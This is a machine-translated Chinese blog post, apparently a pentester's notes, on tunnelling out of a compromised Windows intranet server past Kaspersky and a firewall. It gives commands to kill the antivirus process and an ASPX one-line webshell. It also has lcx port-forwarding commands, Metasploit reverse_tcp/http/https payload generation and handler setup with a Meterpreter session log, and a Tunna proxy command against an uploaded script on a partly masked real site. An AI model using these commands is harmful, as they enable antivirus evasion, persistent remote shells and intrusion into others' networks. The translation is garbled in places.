当前位置:网站首页>A summary of the posture of bouncing and forwarding around the firewall
A summary of the posture of bouncing and forwarding around the firewall
2022-06-24 07:29:00 【Xiaoxiang Xin'an】
Statement : Most of the official account is from the author's daily notes. , A few articles are also reproduced by authorship of the original author and other official account. , unaccredited , It is strictly prohibited to reprint , If you want to reprint , Contact and talk . Do not use the related technology in the article to engage in illegal testing , Any adverse consequences arising from this are not related to the author and the official account. . |
|---|
0x01 Preface
Date/time:2014 year , Recently, I got some pain from setting up an intranet server , There is Kaspersky Anti-Virus 8.0. In the normal environment, the intranet is used directly Lcx Forward the specified port to , But how to bypass the firewall ? Here I wrote this record article according to the practice test process .
Bypass Kaba to get the session :
kavfswp.exe It is Kaspersky's anti-virus work process , Used to intercept malicious programs , Such as the common right raising EXP、MSF Load, etc , However, it is found in the test that this process can be ended ( With self start ), It will automatically run the process a few seconds after the end of the process , But there will be a few seconds between them , Use the interval time to quickly MSF Just upload the load and run it .
notes : It was found that there were several times when they did not run for a long time kavfswp.exe, The test was a little painful , I will not worry about this problem any more .
taskkill /f /im kavfswp.exe
In the actual test process, we have put Kaspersky After the anti-virus protection is turned off, it still cannot be forwarded normally , So I guess the system firewall may be turned on or there may be some other hardware firewall , The following tools and methods were tested in this bypass case .
0x02 Lcx
The regular Intranet environment can be used directly Lcx.exe Forward the specified port , Then connect locally 1234 Port can . But here we can see what we are listening to 51 The connection status of the port is SYN_SENT, The probability is that it is blocked by the firewall inbound and outbound rules .
C:\Recovery\lcx.exe -listen 51 1234 C:\Recovery\lcx.exe -slave 113.xxx.xx.5 51 127.0.0.1 3389 [option:] -listen Connection port <ConnectPort> Sending port <TransmitPort> -tran Connection port <ConnectPort> Sending host <TransmitHost> Sending port <TransmitPort> -slave Connecting hosts <ConnectHost> Connection port <ConnectPort> Sending host <TransmitHost> Sending port <TransmitPort>
Basic friend @KoMas Tips : Use Lcx The listening port can be changed to 80 You can bypass firewall restrictions , During the test, you should pay attention to check the local 80 Whether the port is occupied , If it is occupied, an error will be returned , Missing picture .(Success !)
0x03 Aspx Client
Aspx Client In a word, code :
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>C:\Recovery\lcx.exe -listen 52 1234 [+] Listening port 52 ...... [+] Listen OK! [+] Listening port 1234 ...... [+] Listen OK! [+] Waiting for Client on port:52 ......
0x04 Metasploit
(1) Reverse_tcp
Use Metasploit Generate attack payloads and listen , Then the attack payload port.exe File by Webshell Upload to the target disk and execute , You can see that one is blocked by the firewall , As shown in the figure below .
[email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=113.***.**.250 LPORT=12345 X > /media/hake/port.exe msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.10 msf exploit(handler) > set LPORT 12345 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.10:12345 [*] Starting the payload handler...
stay 《Metasploit bind_tcp Actual combat application 》 The precautions mentioned in the article : If reverse_tcp Try to change the port after the reverse connection is blocked 80、443、8080, These ports are rarely blocked , After the actual test, it is found that the listening port only needs to be changed to 80 You can bypass firewall restrictions to get Meterpreter conversation .(Success !)
(2) Bind_tcp
Use bind_tcp Used for forward connection test 9999 Listening port , After running the attack payload, the target host is opened 9999 port , But not with our attack aircraft IP establish TCP Connect .
[email protected]:~# msfpayload windows/meterpreter/bind_tcp LPORT=9999 X > /media/hake/port.exe msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(handler) > set RHOST 80.**.**.21 msf exploit(handler) > set LPORT 9999 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler...
(3) Reverse_http
Metasploit_Reverse_http The idea comes from 90sec A Daniel and DM_ An article from “metasploit Notes on Intranet penetration ”, But in the actual test, it is found that , Using other ports will be blocked by the firewall , As shown in the figure below .
[email protected]:~# msfpayload windows/meterpreter/reverse_http LHOST=113.***.**.236 LPORT=4444 R | msfencode -t aspx -o /media/hake/port.aspx msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http msf exploit(handler) > set LHOST 192.168.1.9 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit [*] Started HTTP reverse handler on http://0.0.0.0:4444/ [*] Starting the payload handler...
Basic friend @darkz3r Tips , He usually uses 443 Port as listening port , With the attitude of trying, I didn't expect to really succeed , According to him, heikuo is often used in foreign countries 443 Port to listen .
(4) Reverse_https
We tested it earlier Reverse_tcp Listening port 1234 and reverse_http Listening port 4444 Are blocked by the firewall , But testing reverse_https Listening port 4444 It was found that the firewall restriction was successfully bypassed to obtain Meterpreter conversation , Missing picture .
[email protected]:~# msfpayload windows/meterpreter/reverse_https LHOST=113.***.**.106 LPORT=4444 X > /media/hake/test.exe msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf exploit(handler) > set LHOST 192.168.1.9 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit [*] Started HTTPS reverse handler on https://0.0.0.0:4444/ [*] Starting the payload handler... [*] 113.***.**.106:2069 Request received for /5xWX... [*] 113.***.**.106:2069 Staging connection for target /5xWX received... [*] Patched user-agent at offset 663656... [*] Patched transport at offset 663320... [*] Patched URL at offset 663384... [*] Patched Expiration Timeout at offset 664256... [*] Patched Communication Timeout at offset 664260... [*] Meterpreter session 3 opened (192.168.1.5:4444 -> 80.**.**.21:2069) at 2014-08-05 23:49:20 +0800
0x05 reDuh_Gui
reDuh_Gui The tool support scripts are :ASPX/PHP/JSP, In the process of penetration testing, it also depends on which scripts the target host supports , The target host I tested here supports ASPX/PHP Script , take ASPX The script does a demo test , As shown in the figure below .
0x06 Http_Tunna
We often use reDuh、Tunna and reGeorg And so on are positive agents , Upload the proxy script to the server , The local program connects to the script on the server , Script as agent forwarding port and traffic , It is also called port multiplexing ,HTTP Tunnel .
although Http_Tunna and reDuh_Gui It works the same way , but Http_Tunna than reDuh_Gui Fast , And more stable . Support scripts include :ASPX/PHP/JSP, You can also directly Metasploit Use... Under the frame , But first you have to tunna_exploit.rb Copy the document to MSF Module directory , Missing picture .
[email protected]:~# ruby proxy.rb -u http://www.canton*********dolonne.fr/u_fichier/conn.aspx -l 1234 -r 3389 -v msf > use exploit/windows/misc/tunna_exploit msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(tunna_exploit) > set RHOST 113.***.**.236 msf exploit(tunna_exploit) > set TARGETURI http://www.canton*********dolonne.fr/u_fichier/conn.aspx msf exploit(tunna_exploit) > set VERBOSE true msf exploit(tunna_exploit) > exploit -j
notes : It was found in the test that reDuh_Gui succeed , and Http_Tunna But failed , Maybe I have a problem with my posture , It could be Http_Tunna ASPX Script problems ,@ Chen Xiaobing Shifu also mentioned in his article that I saw JSP and PHP Successful port forwarding , Therefore, it is necessary to conduct more tests in actual combat , The author will no longer study the reasons for its failure in detail .
0x07 Bypass Firewall
Ⅰ. Use the reverse connection test 80/443 Wait for the listening port to see if it can bypass the firewall restrictions .(Success !)
1. Lcx、2. Aspx Client、3.1 Reverse_tcp、3.3 Reverse_http、3.3 Reverse_https
Ⅱ. Use the forward connection test Bind_tcp Attack payload to see if it can bypass firewall restrictions .(Failure!)
3.2 Bind_tcp
Ⅲ. Use HTTP Tunnel test reDuh_Gui,Tunna_0.1 And other tools to see if they can bypass firewall restrictions .(Success !)
4. reDuh_Gui、5. Http_Tunna、reGeorg、neo_reGeorg
边栏推荐
- Deploy loglistener in tke container to collect logs to CLS
- bjdctf_ 2020_ babystack
- Accelerate large-scale data analysis based on Apache iceberg through data organization optimization
- [MRCTF2020]千层套路
- Precipitation of architecture design methodology
- What is automated testing? What software projects are suitable for automated testing?
- Record the problem location experience when an application is suddenly killed
- The fund management of London gold is more important than others
- [image fusion] image fusion based on NSST and PCNN with matlab code
- 取模软件 模拟显示验证取模数据正确性 逆向 把点阵数组bin文件转显示
猜你喜欢
Learning to use BACnet gateway of building control system is not so difficult
The fund management of London gold is more important than others
【WordPress建站】5. 设置代码高亮
前缀和专题训练
get_ started_ 3dsctf_ two thousand and sixteen
20 not to be missed ES6 tips
Bjdctf 2020 Bar _ Babystack
![[equalizer] bit error rate performance comparison simulation of LS equalizer, def equalizer and LMMSE equalizer](/img/45/61258aa20cd287047c028f220b7f7a.png)
[equalizer] bit error rate performance comparison simulation of LS equalizer, def equalizer and LMMSE equalizer
(CVE-2020-11978)Airflow dag中的命令注入漏洞复现【vulhub靶场】
【pointNet】基于pointNet的三维点云目标分类识别matlab仿真
随机推荐
二分专题训练
关于取模数据序号定位的说明 区码定位是指GBK编码
现货黄金有哪些眩人的小技术?
【图像融合】基于NSST结合PCNN实现图像融合附matlab代码
How to distinguish PAAS, IAAs and SaaS?
捏脸师: 炙手可热的元宇宙造型师
Leetcode probability interview shock series 11~15
湖北专升本-湖师计科
(CVE-2020-11978)Airflow dag中的命令注入漏洞复现【vulhub靶场】
PCL calculates the area of a polygon
【MySQL 使用秘籍】克隆数据表、保存查询数据至数据表以及创建临时表
【Vulhub靶场】】zabbix-SQL注入(CVE-2016-10134)漏洞复现
[WUSTCTF2020]alison_ likes_ jojo
How can win11 set the CPU performance to be fully turned on? How does win11cpu set high performance mode?
取模软件 模拟显示验证取模数据正确性 逆向 把点阵数组bin文件转显示
How to select a third-party software testing company? 2022 ranking of domestic software testing institutions
简单使用Modbus转BACnet网关教程
使用SystemParametersInfo访问用户界面设置
Deploy loglistener in tke container to collect logs to CLS
[frame rate doubling] development and implementation of FPGA based video frame rate doubling system Verilog